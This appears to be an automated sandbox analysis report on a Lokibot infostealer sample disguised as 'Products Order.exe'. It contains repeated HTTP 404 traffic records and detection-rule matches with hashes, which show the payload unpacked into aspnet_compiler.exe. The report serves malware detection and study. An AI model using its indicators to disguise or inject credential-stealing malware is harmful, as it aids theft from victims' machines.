                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:29 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:31 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:35 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:39 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:42 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:44 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:47 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:55 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:59 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:03 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:05 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:11 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:16 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:18 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:21 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:23 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:25 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:27 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:29 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:31 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:36 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:39 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:47 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:52 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:54 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/

                  System Summary

                  barindex
                  Source: 0.2.Products Order.exe.12aa64d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 0.2.Products Order.exe.12aa64d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 0.2.Products Order.exe.12aa64d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 0.2.Products Order.exe.12aa64d0.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.Products Order.exe.12aa64d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 2.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 2.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 2.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 2.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 2.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 2.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 2.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 2.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 2.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 2.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 0.2.Products Order.exe.12aa64d0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 0.2.Products Order.exe.12aa64d0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 0.2.Products Order.exe.12aa64d0.2.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 0.2.Products Order.exe.12aa64d0.2.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                  Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: Process Memory Space: Products Order.exe PID: 3436, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: Process Memory Space: aspnet_compiler.exe PID: 5352, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: Products Order.exe, QMx9nrlke0nNv5xie5.csLong String: Length: 177762
                  Source: Products Order.exe, QMx9nrlke0nNv5xie5.csLong String: Length: 105414
                  Source: initial sampleStatic PE information: Filename: Products Order.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040549C2_2_0040549C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_004029D42_2_004029D4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0041219C appears 45 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00405B6F appears 42 times
                  Source: Products Order.exe, 00000000.00000002.1966747720.0000000000A50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSkidomoney.dll6 vs Products Order.exe
                  Source: Products Order.exe, 00000000.00000000.1960275029.00000000004D9000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMly015.exe4 vs Products Order.exe
                  Source: Products Order.exeBinary or memory string: OriginalFilenameMly015.exe4 vs Products Order.exe
                  Source: Products Order.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: 0.2.Products Order.exe.12aa64d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 0.2.Products Order.exe.12aa64d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 0.2.Products Order.exe.12aa64d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 0.2.Products Order.exe.12aa64d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.Products Order.exe.12aa64d0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 2.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 2.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 2.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 2.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 2.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 2.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 2.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 2.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 2.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 2.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
